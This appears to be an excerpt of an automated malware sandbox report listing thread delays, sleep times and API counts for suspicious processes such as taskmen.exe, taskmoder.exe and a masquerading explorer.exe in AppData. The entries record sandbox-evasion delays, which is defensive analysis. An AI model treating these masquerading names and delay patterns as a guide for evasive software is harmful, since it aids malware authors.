                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\explorer.exeThread delayed: delay time: 922337203685477
                        Source: C:\Users\user\AppData\Roaming\upx.exeThread delayed: delay time: 922337203685477
                        Source: C:\Users\user\AppData\Local\Temp\taskmen.exeThread delayed: delay time: 922337203685477
                        Source: C:\Users\user\AppData\Local\Temp\taskmen.exeThread delayed: delay time: 600000
                        Source: C:\Users\user\AppData\Local\Temp\taskmen.exeThread delayed: delay time: 599859
                        Source: C:\Users\user\AppData\Local\Temp\taskmen.exeThread delayed: delay time: 599728
                        Source: C:\Users\user\AppData\Local\Temp\taskmen.exeThread delayed: delay time: 599562
                        Source: C:\Users\user\AppData\Local\Temp\taskmen.exeThread delayed: delay time: 599140
                        Source: C:\Users\user\AppData\Local\Temp\taskmen.exeThread delayed: delay time: 599014
                        Source: C:\Users\user\AppData\Local\Temp\taskmen.exeThread delayed: delay time: 598875
                        Source: C:\Users\user\AppData\Local\Temp\taskmen.exeThread delayed: delay time: 598725
                        Source: C:\Users\user\AppData\Local\Temp\taskmen.exeThread delayed: delay time: 598606
                        Source: C:\Users\user\AppData\Local\Temp\taskmen.exeThread delayed: delay time: 598483
                        Source: C:\Users\user\AppData\Local\Temp\taskmen.exeThread delayed: delay time: 598366
                        Source: C:\Users\user\AppData\Local\Temp\taskmen.exeThread delayed: delay time: 598232
                        Source: C:\Users\user\AppData\Local\Temp\taskmen.exeThread delayed: delay time: 598109
                        Source: C:\Users\user\AppData\Local\Temp\taskmen.exeThread delayed: delay time: 597987
                        Source: C:\Users\user\AppData\Local\Temp\taskmen.exeThread delayed: delay time: 597871
                        Source: C:\Users\user\AppData\Local\Temp\taskmen.exeThread delayed: delay time: 597757
                        Source: C:\Users\user\AppData\Local\Temp\taskmen.exeThread delayed: delay time: 597630
                        Source: C:\Users\user\AppData\Local\Temp\taskmen.exeThread delayed: delay time: 597505
                        Source: C:\Users\user\AppData\Local\Temp\taskmen.exeThread delayed: delay time: 597359
                        Source: C:\Users\user\AppData\Local\Temp\taskmen.exeThread delayed: delay time: 597231
                        Source: C:\Users\user\AppData\Local\Temp\taskmen.exeThread delayed: delay time: 597060
                        Source: C:\Users\user\AppData\Local\Temp\taskmen.exeThread delayed: delay time: 596547
                        Source: C:\Users\user\AppData\Local\Temp\taskmen.exeThread delayed: delay time: 596386
                        Source: C:\Users\user\AppData\Local\Temp\taskmen.exeThread delayed: delay time: 596262
                        Source: C:\Users\user\AppData\Local\Temp\taskmen.exeThread delayed: delay time: 596134
                        Source: C:\Users\user\AppData\Local\Temp\taskmen.exeThread delayed: delay time: 596007
                        Source: C:\Users\user\AppData\Local\Temp\taskmen.exeThread delayed: delay time: 595874
                        Source: C:\Users\user\AppData\Local\Temp\taskmen.exeThread delayed: delay time: 595756
                        Source: C:\Users\user\AppData\Local\Temp\taskmen.exeThread delayed: delay time: 595618
                        Source: C:\Users\user\AppData\Local\Temp\taskmen.exeThread delayed: delay time: 595453
                        Source: C:\Users\user\AppData\Local\Temp\taskmen.exeThread delayed: delay time: 595309
                        Source: C:\Users\user\AppData\Local\Temp\taskmen.exeThread delayed: delay time: 595147
                        Source: C:\Users\user\AppData\Local\Temp\taskmen.exeThread delayed: delay time: 595027
                        Source: C:\Users\user\AppData\Local\Temp\taskmen.exeThread delayed: delay time: 594906
                        Source: C:\Users\user\AppData\Local\Temp\taskmen.exeThread delayed: delay time: 594776
                        Source: C:\Users\user\AppData\Local\Temp\taskmen.exeThread delayed: delay time: 594656
                        Source: C:\Users\user\AppData\Local\Temp\taskmen.exeThread delayed: delay time: 594508
                        Source: C:\Users\user\AppData\Local\Temp\taskmen.exeThread delayed: delay time: 594297
                        Source: C:\Users\user\AppData\Local\Temp\taskmen.exeThread delayed: delay time: 593890
                        Source: C:\Users\user\AppData\Local\Temp\taskmen.exeThread delayed: delay time: 593719
                        Source: C:\Users\user\AppData\Local\Temp\taskmen.exeThread delayed: delay time: 593531
                        Source: C:\Users\user\AppData\Local\Temp\taskmen.exeThread delayed: delay time: 593357
                        Source: C:\Users\user\AppData\Local\Temp\taskmen.exeThread delayed: delay time: 593187
                        Source: C:\Users\user\AppData\Local\Temp\taskmen.exeThread delayed: delay time: 592937
                        Source: C:\Users\user\AppData\Local\Temp\taskmen.exeThread delayed: delay time: 592640
                        Source: C:\Users\user\AppData\Local\Temp\taskmen.exeThread delayed: delay time: 592447
                        Source: C:\Users\user\AppData\Local\Temp\taskmen.exeThread delayed: delay time: 592250
                        Source: C:\Users\user\AppData\Local\Temp\taskmen.exeThread delayed: delay time: 592031
                        Source: C:\Users\user\AppData\Local\Temp\taskmen.exeThread delayed: delay time: 591765
                        Source: C:\Users\user\AppData\Local\Temp\taskmen.exeThread delayed: delay time: 591281
                        Source: C:\Users\user\AppData\Local\Temp\taskmen.exeThread delayed: delay time: 591062
                        Source: C:\Users\user\AppData\Local\Temp\taskmen.exeThread delayed: delay time: 590890
                        Source: C:\Users\user\AppData\Local\Temp\taskmen.exeThread delayed: delay time: 590672
                        Source: C:\Users\user\AppData\Local\Temp\taskmen.exeThread delayed: delay time: 590484
                        Source: C:\Users\user\AppData\Local\Temp\taskmen.exeThread delayed: delay time: 590297
                        Source: C:\Users\user\AppData\Local\Temp\taskmen.exeThread delayed: delay time: 590125
                        Source: C:\Users\user\AppData\Local\Temp\taskmen.exeThread delayed: delay time: 589984
                        Source: C:\Users\user\AppData\Local\Temp\taskmen.exeThread delayed: delay time: 589843
                        Source: C:\Users\user\AppData\Local\Temp\taskmen.exeThread delayed: delay time: 589672
                        Source: C:\Users\user\AppData\Local\Temp\taskmen.exeThread delayed: delay time: 589469
                        Source: C:\Users\user\AppData\Local\Temp\taskmen.exeThread delayed: delay time: 589281
                        Source: C:\Users\user\AppData\Local\Temp\taskmen.exeThread delayed: delay time: 589000
                        Source: C:\Users\user\AppData\Local\Temp\taskmen.exeThread delayed: delay time: 588651
                        Source: C:\Users\user\AppData\Local\Temp\taskmen.exeThread delayed: delay time: 588359
                        Source: C:\Users\user\AppData\Local\Temp\taskmen.exeThread delayed: delay time: 588186
                        Source: C:\Users\user\AppData\Local\Temp\taskmen.exeThread delayed: delay time: 587984
                        Source: C:\Users\user\AppData\Local\Temp\taskmen.exeThread delayed: delay time: 587870
                        Source: C:\Users\user\AppData\Local\Temp\taskmen.exeThread delayed: delay time: 587709
                        Source: C:\Users\user\AppData\Local\Temp\taskmen.exeThread delayed: delay time: 587515
                        Source: C:\Users\user\AppData\Local\Temp\taskmen.exeThread delayed: delay time: 587281
                        Source: C:\Users\user\AppData\Local\Temp\taskmen.exeThread delayed: delay time: 587062
                        Source: C:\Users\user\AppData\Local\Temp\taskmen.exeThread delayed: delay time: 586859
                        Source: C:\Users\user\AppData\Local\Temp\taskmen.exeThread delayed: delay time: 586700
                        Source: C:\Users\user\AppData\Local\Temp\taskmen.exeThread delayed: delay time: 586047
                        Source: C:\Users\user\AppData\Local\Temp\taskmen.exeThread delayed: delay time: 585750
                        Source: C:\Users\user\AppData\Local\Temp\taskmen.exeThread delayed: delay time: 585594
                        Source: C:\Users\user\AppData\Local\Temp\taskmen.exeThread delayed: delay time: 585468
                        Source: C:\Users\user\AppData\Local\Temp\taskmen.exeThread delayed: delay time: 585340
                        Source: C:\Users\user\AppData\Local\Temp\taskmen.exeThread delayed: delay time: 585149
                        Source: C:\Users\user\AppData\Local\Temp\taskmen.exeThread delayed: delay time: 585027
                        Source: C:\Users\user\AppData\Local\Temp\taskmen.exeThread delayed: delay time: 584911
                        Source: C:\Users\user\AppData\Local\Temp\taskmen.exeThread delayed: delay time: 584719
                        Source: C:\Users\user\AppData\Local\Temp\taskmen.exeThread delayed: delay time: 584580
                        Source: C:\Users\user\AppData\Local\Temp\taskmen.exeThread delayed: delay time: 584451
                        Source: C:\Users\user\AppData\Local\Temp\taskmen.exeThread delayed: delay time: 584281
                        Source: C:\Users\user\AppData\Local\Temp\taskmen.exeThread delayed: delay time: 584141
                        Source: C:\Users\user\AppData\Local\Temp\taskmen.exeThread delayed: delay time: 584015
                        Source: C:\Users\user\AppData\Local\Temp\taskmen.exeThread delayed: delay time: 583890
                        Source: C:\Users\user\AppData\Local\Temp\taskmen.exeThread delayed: delay time: 583609
                        Source: C:\Users\user\AppData\Local\Temp\taskmen.exeThread delayed: delay time: 583062
                        Source: C:\Users\user\AppData\Local\Temp\taskmen.exeThread delayed: delay time: 582911
                        Source: C:\Users\user\AppData\Local\Temp\taskmen.exeThread delayed: delay time: 582780
                        Source: C:\Users\user\AppData\Local\Temp\taskmen.exeThread delayed: delay time: 582647
                        Source: C:\Users\user\AppData\Local\Temp\taskmen.exeThread delayed: delay time: 582527
                        Source: C:\Users\user\AppData\Local\Temp\taskmen.exeThread delayed: delay time: 582404
                        Source: C:\Users\user\AppData\Local\Temp\taskmen.exeThread delayed: delay time: 582250
                        Source: C:\Users\user\AppData\Local\Temp\taskmen.exeThread delayed: delay time: 582078
                        Source: C:\Users\user\AppData\Local\Temp\taskmen.exeThread delayed: delay time: 581890
                        Source: C:\Users\user\AppData\Local\Temp\taskmen.exeThread delayed: delay time: 581757
                        Source: C:\Users\user\AppData\Local\Temp\taskmen.exeThread delayed: delay time: 581615
                        Source: C:\Users\user\AppData\Local\Temp\taskmen.exeThread delayed: delay time: 581469
                        Source: C:\Users\user\AppData\Local\Temp\taskmen.exeThread delayed: delay time: 581327
                        Source: C:\Users\user\AppData\Local\Temp\taskmen.exeThread delayed: delay time: 581125
                        Source: C:\Users\user\AppData\Local\Temp\taskmen.exeThread delayed: delay time: 580732
                        Source: C:\Users\user\AppData\Local\Temp\taskmen.exeThread delayed: delay time: 580582
                        Source: C:\Users\user\AppData\Local\Temp\taskmen.exeThread delayed: delay time: 580437
                        Source: C:\Users\user\AppData\Local\Temp\taskmen.exeThread delayed: delay time: 580299
                        Source: C:\Users\user\AppData\Local\Temp\taskmen.exeThread delayed: delay time: 580078
                        Source: C:\Users\user\AppData\Local\Temp\taskmen.exeThread delayed: delay time: 579905
                        Source: C:\Users\user\AppData\Local\Temp\taskmen.exeThread delayed: delay time: 579765
                        Source: C:\Users\user\AppData\Local\Temp\taskmen.exeThread delayed: delay time: 579637
                        Source: C:\Users\user\AppData\Local\Temp\taskmen.exeThread delayed: delay time: 579520
                        Source: C:\Users\user\AppData\Local\Temp\taskmen.exeThread delayed: delay time: 579397
                        Source: C:\Users\user\AppData\Local\Temp\taskmen.exeThread delayed: delay time: 579281
                        Source: C:\Users\user\AppData\Local\Temp\taskmen.exeThread delayed: delay time: 579171
                        Source: C:\Users\user\AppData\Local\Temp\taskmen.exeThread delayed: delay time: 579022
                        Source: C:\Users\user\AppData\Local\Temp\taskmen.exeThread delayed: delay time: 578905
                        Source: C:\Users\user\AppData\Local\Temp\taskmen.exeThread delayed: delay time: 578787
                        Source: C:\Users\user\AppData\Local\Temp\taskmen.exeThread delayed: delay time: 578656
                        Source: C:\Users\user\AppData\Local\Temp\taskmen.exeThread delayed: delay time: 578500
                        Source: C:\Users\user\AppData\Local\Temp\taskmen.exeThread delayed: delay time: 578187
                        Source: C:\Users\user\AppData\Local\Temp\taskmen.exeThread delayed: delay time: 578052
                        Source: C:\Users\user\AppData\Local\Temp\taskmen.exeThread delayed: delay time: 577934
                        Source: C:\Users\user\AppData\Local\Temp\taskmen.exeThread delayed: delay time: 577825
                        Source: C:\Users\user\AppData\Local\Temp\taskmen.exeThread delayed: delay time: 577715
                        Source: C:\Users\user\AppData\Local\Temp\taskmen.exeThread delayed: delay time: 577609
                        Source: C:\Users\user\AppData\Local\Temp\taskmen.exeThread delayed: delay time: 577498
                        Source: C:\Users\user\AppData\Local\Temp\taskmen.exeThread delayed: delay time: 577328
                        Source: C:\Users\user\AppData\Local\Temp\taskmen.exeThread delayed: delay time: 577172
                        Source: C:\Users\user\AppData\Local\Temp\taskmen.exeThread delayed: delay time: 577043
                        Source: C:\Users\user\AppData\Local\Temp\taskmen.exeThread delayed: delay time: 576934
                        Source: C:\Users\user\AppData\Local\Temp\taskmen.exeThread delayed: delay time: 576826
                        Source: C:\Users\user\AppData\Local\Temp\taskmen.exeThread delayed: delay time: 576718
                        Source: C:\Users\user\AppData\Local\Temp\taskmen.exeThread delayed: delay time: 576548
                        Source: C:\Users\user\AppData\Local\Temp\taskmen.exeThread delayed: delay time: 576422
                        Source: C:\Users\user\AppData\Local\Temp\taskmen.exeThread delayed: delay time: 576306
                        Source: C:\Users\user\AppData\Local\Temp\taskmen.exeThread delayed: delay time: 576203
                        Source: C:\Users\user\AppData\Local\Temp\taskmen.exeThread delayed: delay time: 576059
                        Source: C:\Users\user\AppData\Local\Temp\taskmen.exeThread delayed: delay time: 575932
                        Source: C:\Users\user\AppData\Local\Temp\taskmen.exeThread delayed: delay time: 575547
                        Source: C:\Users\user\AppData\Local\Temp\taskmen.exeThread delayed: delay time: 575370
                        Source: C:\Users\user\AppData\Local\Temp\taskmen.exeThread delayed: delay time: 575252
                        Source: C:\Users\user\AppData\Local\Temp\RarSFX0\Client (1).vmp.exeThread delayed: delay time: 922337203685477
                        Source: C:\Users\user\AppData\Local\Temp\RarSFX0\Client (1).vmp.exeThread delayed: delay time: 922337203685477
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 600000
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 599875
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 599764
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 599656
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 599545
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 599436
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 599326
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 599219
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 599109
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 599000
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 598890
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 598780
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 598671
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 598558
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 598436
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 598326
                        Source: C:\Users\user\AppData\Roaming\Client (1).vmp.exeThread delayed: delay time: 922337203685477
                        Source: C:\Windows\SysWOW64\wscript.exeWindow found: window name: WSH-Timer
                        Source: C:\Windows\SysWOW64\wscript.exeWindow found: window name: WSH-Timer
                        Source: C:\Windows\SysWOW64\wscript.exeWindow found: window name: WSH-Timer
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5863Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3870Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 7990Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1527Jump to behavior
                        Source: C:\Windows\Temp\ydztkyrb.exeWindow / User API: threadDelayed 1576
                        Source: C:\Windows\Temp\swtpd1aw.exeWindow / User API: threadDelayed 1548
                        Source: C:\Users\user\AppData\Local\Temp\taskmen.exeWindow / User API: threadDelayed 9025
                        Source: C:\Users\user\AppData\Local\Temp\RarSFX0\Client (1).vmp.exeWindow / User API: threadDelayed 5580
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 9465
                        Source: C:\Users\user\AppData\Roaming\taskmoder.exeWindow / User API: threadDelayed 7576
                        Source: C:\Users\user\AppData\Roaming\taskmoder.exeWindow / User API: threadDelayed 525
                        Source: C:\Users\user\AppData\Roaming\taskmoder.exeWindow / User API: threadDelayed 7384
                        Source: C:\Users\user\AppData\Roaming\taskmoder.exeWindow / User API: threadDelayed 544
                        Source: C:\Users\user\Desktop\Winscreen.exe TID: 4508Thread sleep time: -922337203685477s >= -30000sJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3524Thread sleep time: -3689348814741908s >= -30000sJump to behavior
                        Source: C:\Users\user\AppData\Roaming\explorer.exe TID: 2464Thread sleep time: -922337203685477s >= -30000sJump to behavior
                        Source: C:\Users\user\AppData\Roaming\upx.exe TID: 6204Thread sleep time: -922337203685477s >= -30000sJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6448Thread sleep time: -2767011611056431s >= -30000sJump to behavior
                        Source: C:\Users\user\AppData\Roaming\explorer.exe TID: 1708Thread sleep time: -922337203685477s >= -30000s
                        Source: C:\Users\user\AppData\Roaming\upx.exe TID: 5524Thread sleep time: -922337203685477s >= -30000s
                        Source: C:\Users\user\AppData\Roaming\taskmoder.exe TID: 6120Thread sleep time: -30000s >= -30000s
                        Source: C:\Users\user\AppData\Roaming\taskmoder.exe TID: 6120Thread sleep time: -30000s >= -30000s
                        Source: C:\Users\user\AppData\Roaming\taskmoder.exe TID: 6120Thread sleep time: -40000s >= -30000s
                        Source: C:\Users\user\AppData\Local\Temp\taskmen.exe TID: 5616Thread sleep time: -10145709240540247s >= -30000s
                        Source: C:\Users\user\AppData\Local\Temp\taskmen.exe TID: 5616Thread sleep time: -600000s >= -30000s
                        Source: C:\Users\user\AppData\Local\Temp\taskmen.exe TID: 6524Thread sleep count: 9025 > 30
                        Source: C:\Users\user\AppData\Local\Temp\taskmen.exe TID: 5616Thread sleep time: -599859s >= -30000s
                        Source: C:\Users\user\AppData\Local\Temp\taskmen.exe TID: 6524Thread sleep count: 124 > 30
                        Source: C:\Users\user\AppData\Local\Temp\taskmen.exe TID: 5616Thread sleep time: -599728s >= -30000s
                        Source: C:\Users\user\AppData\Local\Temp\taskmen.exe TID: 5616Thread sleep time: -599562s >= -30000s
                        Source: C:\Users\user\AppData\Local\Temp\taskmen.exe TID: 5616Thread sleep time: -599140s >= -30000s
                        Source: C:\Users\user\AppData\Local\Temp\taskmen.exe TID: 5616Thread sleep time: -599014s >= -30000s
                        Source: C:\Users\user\AppData\Local\Temp\taskmen.exe TID: 5616Thread sleep time: -598875s >= -30000s
                        Source: C:\Users\user\AppData\Local\Temp\taskmen.exe TID: 5616Thread sleep time: -598725s >= -30000s
                        Source: C:\Users\user\AppData\Local\Temp\taskmen.exe TID: 5616Thread sleep time: -598606s >= -30000s
                        Source: C:\Users\user\AppData\Local\Temp\taskmen.exe TID: 5616Thread sleep time: -598483s >= -30000s
                        Source: C:\Users\user\AppData\Local\Temp\taskmen.exe TID: 5616Thread sleep time: -598366s >= -30000s
                        Source: C:\Users\user\AppData\Local\Temp\taskmen.exe TID: 5616Thread sleep time: -598232s >= -30000s
                        Source: C:\Users\user\AppData\Local\Temp\taskmen.exe TID: 5616Thread sleep time: -598109s >= -30000s
                        Source: C:\Users\user\AppData\Local\Temp\taskmen.exe TID: 5616Thread sleep time: -597987s >= -30000s
                        Source: C:\Users\user\AppData\Local\Temp\taskmen.exe TID: 5616Thread sleep time: -597871s >= -30000s
                        Source: C:\Users\user\AppData\Local\Temp\taskmen.exe TID: 5616Thread sleep time: -597757s >= -30000s
                        Source: C:\Users\user\AppData\Local\Temp\taskmen.exe TID: 5616Thread sleep time: -597630s >= -30000s
                        Source: C:\Users\user\AppData\Local\Temp\taskmen.exe TID: 5616Thread sleep time: -597505s >= -30000s
                        Source: C:\Users\user\AppData\Local\Temp\taskmen.exe TID: 5616Thread sleep time: -597359s >= -30000s
                        Source: C:\Users\user\AppData\Local\Temp\taskmen.exe TID: 5616Thread sleep time: -597231s >= -30000s
                        Source: C:\Users\user\AppData\Local\Temp\taskmen.exe TID: 5616Thread sleep time: -597060s >= -30000s
                        Source: C:\Users\user\AppData\Local\Temp\taskmen.exe TID: 5616Thread sleep time: -596547s >= -30000s
                        Source: C:\Users\user\AppData\Local\Temp\taskmen.exe TID: 5616Thread sleep time: -596386s >= -30000s
                        Source: C:\Users\user\AppData\Local\Temp\taskmen.exe TID: 5616Thread sleep time: -596262s >= -30000s
                        Source: C:\Users\user\AppData\Local\Temp\taskmen.exe TID: 5616Thread sleep time: -596134s >= -30000s
                        Source: C:\Users\user\AppData\Local\Temp\taskmen.exe TID: 5616Thread sleep time: -596007s >= -30000s
                        Source: C:\Users\user\AppData\Local\Temp\taskmen.exe TID: 5616Thread sleep time: -595874s >= -30000s
                        Source: C:\Users\user\AppData\Local\Temp\taskmen.exe TID: 5616Thread sleep time: -595756s >= -30000s
                        Source: C:\Users\user\AppData\Local\Temp\taskmen.exe TID: 5616Thread sleep time: -595618s >= -30000s
                        Source: C:\Users\user\AppData\Local\Temp\taskmen.exe TID: 5616Thread sleep time: -595453s >= -30000s
                        Source: C:\Users\user\AppData\Local\Temp\taskmen.exe TID: 5616Thread sleep time: -595309s >= -30000s
                        Source: C:\Users\user\AppData\Local\Temp\taskmen.exe TID: 5616Thread sleep time: -595147s >= -30000s
                        Source: C:\Users\user\AppData\Local\Temp\taskmen.exe TID: 5616Thread sleep time: -595027s >= -30000s
                        Source: C:\Users\user\AppData\Local\Temp\taskmen.exe TID: 5616Thread sleep time: -594906s >= -30000s
                        Source: C:\Users\user\AppData\Local\Temp\taskmen.exe TID: 5616Thread sleep time: -594776s >= -30000s
                        Source: C:\Users\user\AppData\Local\Temp\taskmen.exe TID: 5616Thread sleep time: -594656s >= -30000s
                        Source: C:\Users\user\AppData\Local\Temp\taskmen.exe TID: 5616Thread sleep time: -594508s >= -30000s
                        Source: C:\Users\user\AppData\Local\Temp\taskmen.exe TID: 5616Thread sleep time: -594297s >= -30000s
                        Source: C:\Users\user\AppData\Local\Temp\taskmen.exe TID: 5616Thread sleep time: -593890s >= -30000s
                        Source: C:\Users\user\AppData\Local\Temp\taskmen.exe TID: 5616Thread sleep time: -593719s >= -30000s
                        Source: C:\Users\user\AppData\Local\Temp\taskmen.exe TID: 5616Thread sleep time: -593531s >= -30000s
                        Source: C:\Users\user\AppData\Local\Temp\taskmen.exe TID: 5616Thread sleep time: -593357s >= -30000s
                        Source: C:\Users\user\AppData\Local\Temp\taskmen.exe TID: 5616Thread sleep time: -593187s >= -30000s
                        Source: C:\Users\user\AppData\Local\Temp\taskmen.exe TID: 5616Thread sleep time: -592937s >= -30000s
                        Source: C:\Users\user\AppData\Local\Temp\taskmen.exe TID: 5616Thread sleep time: -592640s >= -30000s
                        Source: C:\Users\user\AppData\Local\Temp\taskmen.exe TID: 5616Thread sleep time: -592447s >= -30000s
                        Source: C:\Users\user\AppData\Local\Temp\taskmen.exe TID: 5616Thread sleep time: -592250s >= -30000s
                        Source: C:\Users\user\AppData\Local\Temp\taskmen.exe TID: 5616Thread sleep time: -592031s >= -30000s
                        Source: C:\Users\user\AppData\Local\Temp\taskmen.exe TID: 5616Thread sleep time: -591765s >= -30000s
                        Source: C:\Users\user\AppData\Local\Temp\taskmen.exe TID: 5616Thread sleep time: -591281s >= -30000s
                        Source: C:\Users\user\AppData\Local\Temp\taskmen.exe TID: 5616Thread sleep time: -591062s >= -30000s
                        Source: C:\Users\user\AppData\Local\Temp\taskmen.exe TID: 5616Thread sleep time: -590890s >= -30000s
                        Source: C:\Users\user\AppData\Local\Temp\taskmen.exe TID: 5616Thread sleep time: -590672s >= -30000s
                        Source: C:\Users\user\AppData\Local\Temp\taskmen.exe TID: 5616Thread sleep time: -590484s >= -30000s
                        Source: C:\Users\user\AppData\Local\Temp\taskmen.exe TID: 5616Thread sleep time: -590297s >= -30000s
                        Source: C:\Users\user\AppData\Local\Temp\taskmen.exe TID: 5616Thread sleep time: -590125s >= -30000s
                        Source: C:\Users\user\AppData\Local\Temp\taskmen.exe TID: 5616Thread sleep time: -589984s >= -30000s
                        Source: C:\Users\user\AppData\Local\Temp\taskmen.exe TID: 5616Thread sleep time: -589843s >= -30000s
                        Source: C:\Users\user\AppData\Local\Temp\taskmen.exe TID: 5616Thread sleep time: -589672s >= -30000s
                        Source: C:\Users\user\AppData\Local\Temp\taskmen.exe TID: 5616Thread sleep time: -589469s >= -30000s
                        Source: C:\Users\user\AppData\Local\Temp\taskmen.exe TID: 5616Thread sleep time: -589281s >= -30000s
                        Source: C:\Users\user\AppData\Local\Temp\taskmen.exe TID: 5616Thread sleep time: -589000s >= -30000s
                        Source: C:\Users\user\AppData\Local\Temp\taskmen.exe TID: 5616Thread sleep time: -588651s >= -30000s
                        Source: C:\Users\user\AppData\Local\Temp\taskmen.exe TID: 5616Thread sleep time: -588359s >= -30000s
                        Source: C:\Users\user\AppData\Local\Temp\taskmen.exe TID: 5616Thread sleep time: -588186s >= -30000s
                        Source: C:\Users\user\AppData\Local\Temp\taskmen.exe TID: 5616Thread sleep time: -587984s >= -30000s
                        Source: C:\Users\user\AppData\Local\Temp\taskmen.exe TID: 5616Thread sleep time: -587870s >= -30000s
                        Source: C:\Users\user\AppData\Local\Temp\taskmen.exe TID: 5616Thread sleep time: -587709s >= -30000s
                        Source: C:\Users\user\AppData\Local\Temp\taskmen.exe TID: 5616Thread sleep time: -587515s >= -30000s
                        Source: C:\Users\user\AppData\Local\Temp\taskmen.exe TID: 5616Thread sleep time: -587281s >= -30000s
                        Source: C:\Users\user\AppData\Local\Temp\taskmen.exe TID: 5616Thread sleep time: -587062s >= -30000s
                        Source: C:\Users\user\AppData\Local\Temp\taskmen.exe TID: 5616Thread sleep time: -586859s >= -30000s
                        Source: C:\Users\user\AppData\Local\Temp\taskmen.exe TID: 5616Thread sleep time: -586700s >= -30000s
                        Source: C:\Users\user\AppData\Local\Temp\taskmen.exe TID: 5616Thread sleep time: -586047s >= -30000s
                        Source: C:\Users\user\AppData\Local\Temp\taskmen.exe TID: 5616Thread sleep time: -585750s >= -30000s
                        Source: C:\Users\user\AppData\Local\Temp\taskmen.exe TID: 5616Thread sleep time: -585594s >= -30000s
                        Source: C:\Users\user\AppData\Local\Temp\taskmen.exe TID: 5616Thread sleep time: -585468s >= -30000s
                        Source: C:\Users\user\AppData\Local\Temp\taskmen.exe TID: 5616Thread sleep time: -585340s >= -30000s
                        Source: C:\Users\user\AppData\Local\Temp\taskmen.exe TID: 5616Thread sleep time: -585149s >= -30000s
                        Source: C:\Users\user\AppData\Local\Temp\taskmen.exe TID: 5616Thread sleep time: -585027s >= -30000s
                        Source: C:\Users\user\AppData\Local\Temp\taskmen.exe TID: 5616Thread sleep time: -584911s >= -30000s
                        Source: C:\Users\user\AppData\Local\Temp\taskmen.exe TID: 4476Thread sleep time: -500000s >= -30000s
                        Source: C:\Users\user\AppData\Local\Temp\taskmen.exe TID: 5616Thread sleep time: -584719s >= -30000s
                        Source: C:\Users\user\AppData\Local\Temp\taskmen.exe TID: 5616Thread sleep time: -584580s >= -30000s
                        Source: C:\Users\user\AppData\Local\Temp\taskmen.exe TID: 5616Thread sleep time: -584451s >= -30000s
                        Source: C:\Users\user\AppData\Local\Temp\taskmen.exe TID: 5616Thread sleep time: -584281s >= -30000s
                        Source: C:\Users\user\AppData\Local\Temp\taskmen.exe TID: 5616Thread sleep time: -584141s >= -30000s
                        Source: C:\Users\user\AppData\Local\Temp\taskmen.exe TID: 5616Thread sleep time: -584015s >= -30000s
                        Source: C:\Users\user\AppData\Local\Temp\taskmen.exe TID: 5616Thread sleep time: -583890s >= -30000s
                        Source: C:\Users\user\AppData\Local\Temp\taskmen.exe TID: 5616Thread sleep time: -583609s >= -30000s
                        Source: C:\Users\user\AppData\Local\Temp\taskmen.exe TID: 5616Thread sleep time: -583062s >= -30000s
                        Source: C:\Users\user\AppData\Local\Temp\taskmen.exe TID: 5616Thread sleep time: -582911s >= -30000s
                        Source: C:\Users\user\AppData\Local\Temp\taskmen.exe TID: 5616Thread sleep time: -582780s >= -30000s
                        Source: C:\Users\user\AppData\Local\Temp\taskmen.exe TID: 5616Thread sleep time: -582647s >= -30000s
                        Source: C:\Users\user\AppData\Local\Temp\taskmen.exe TID: 5616Thread sleep time: -582527s >= -30000s
                        Source: C:\Users\user\AppData\Local\Temp\taskmen.exe TID: 5616Thread sleep time: -582404s >= -30000s
                        Source: C:\Users\user\AppData\Local\Temp\taskmen.exe TID: 5616Thread sleep time: -582250s >= -30000s
                        Source: C:\Users\user\AppData\Local\Temp\taskmen.exe TID: 5616Thread sleep time: -582078s >= -30000s
                        Source: C:\Users\user\AppData\Local\Temp\taskmen.exe TID: 5616Thread sleep time: -581890s >= -30000s
                        Source: C:\Users\user\AppData\Local\Temp\taskmen.exe TID: 5616Thread sleep time: -581757s >= -30000s
                        Source: C:\Users\user\AppData\Local\Temp\taskmen.exe TID: 5616Thread sleep time: -581615s >= -30000s
                        Source: C:\Users\user\AppData\Local\Temp\taskmen.exe TID: 5616Thread sleep time: -581469s >= -30000s
